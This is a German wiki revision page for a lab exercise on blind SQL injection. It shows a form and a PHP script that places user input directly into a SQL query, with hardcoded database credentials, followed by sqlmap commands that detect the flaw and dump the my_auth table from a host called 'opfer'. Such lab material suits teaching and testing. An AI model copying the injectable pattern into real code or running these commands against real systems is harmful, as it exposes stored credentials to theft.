SQL Blind Injection Proof of Concept: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „*cat blind.html <script lang=html> <!DOCTYPE html> <html> <body> <h2>SQL Injection</h2> <form method="post" action="sql…“)
 
 
(5 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
*cat blind.html
 
*cat blind.html
<script lang=html>
+
<syntaxhighlight lang=html>
 
<!DOCTYPE html>
 
<!DOCTYPE html>
 
<html>
 
<html>
Zeile 18: Zeile 18:
 
         </body>
 
         </body>
 
</html>
 
</html>
</script>
+
</syntaxhighlight>
 +
*cat sql-blind.php
 +
<syntaxhighlight lang=php>
 +
<?php
 +
    $search=($_POST['search']);
 +
    define('DB_SERVER', '127.0.0.1');
 +
    define('DB_USERNAME', 'xinux');
 +
    define('DB_PASSWORD', 'suxer');
 +
    define('DB_NAME', 'verwaltung');
 +
    $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 +
    mysqli_set_charset($link, "utf8");
 +
    if($link === false){
 +
    echo(mysqli_connect_error());
 +
    die("ERROR: Could not connect. " . mysqli_connect_error());
 +
    }
 +
    echo $search;
 +
    $sql =" SELECT * FROM my_auth WHERE user='$search'";
 +
    $result = mysqli_query($link, $sql);
 +
?>
 +
 
 +
<!DOCTYPE html>
 +
<html>
 +
        <body>
 +
                <h2>SQL Injection</h2>
 +
                <table border = "1">
 +
                        <tr>
 +
                                <td>user</td>
 +
                                <td>password</td>
 +
                        </tr>
 +
<?php
 +
  while ($row = mysqli_fetch_row($result)) {
 +
    echo "<tr>";
 +
    echo "<td>".$row[0]." </td>";
 +
    echo "<td>"."xxx"." </td><br>";
 +
    echo "</tr>";
 +
  }
 +
?>
 +
 
 +
 
 +
</syntaxhighlight>
 +
 
 +
 
 +
*sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" --technique=B
 +
*sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" --technique=B --tables
 +
*sqlmap -u "http://opfer/scripts/sql-blind.php" --data="search=erwin" -D verwaltung -T my_auth --dump

Aktuelle Version vom 30. August 2023, 11:41 Uhr

  • cat blind.html
<!DOCTYPE html>
<html>
        <body>
                <h2>SQL Injection</h2>
                <form method="post" action="sql-blind.php">
                  <label for="fname">User</label><br>
                  <input type="text" name="search"><br>
                  <input type="submit" name="submit">
                </form> 
                <br>
                <table border = "1">
                        <tr>
                                <td>user</td>
                                <td>password</td>
                        </tr>
        </body>
</html>
  • cat sql-blind.php
<?php
    $search=($_POST['search']);
    define('DB_SERVER', '127.0.0.1');
    define('DB_USERNAME', 'xinux');
    define('DB_PASSWORD', 'suxer');
    define('DB_NAME', 'verwaltung');
    $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
    mysqli_set_charset($link, "utf8");
     if($link === false){
    echo(mysqli_connect_error());
    die("ERROR: Could not connect. " . mysqli_connect_error());
    }
    echo $search;
    $sql =" SELECT * FROM my_auth WHERE user='$search'";
    $result = mysqli_query($link, $sql);
?>

<!DOCTYPE html>
<html>
        <body>
                <h2>SQL Injection</h2>
                <table border = "1">
                        <tr>
                                <td>user</td>
                                <td>password</td>
                        </tr>
<?php
  while ($row = mysqli_fetch_row($result)) {
    echo "<tr>";
    echo "<td>".$row[0]." </td>";
    echo "<td>"."xxx"." </td><br>";
    echo "</tr>";
  }
?>


Abgerufen von „http://wiki.ixheim.de/index.php?title=SQL_Blind_Injection_Proof_of_Concept&oldid=49006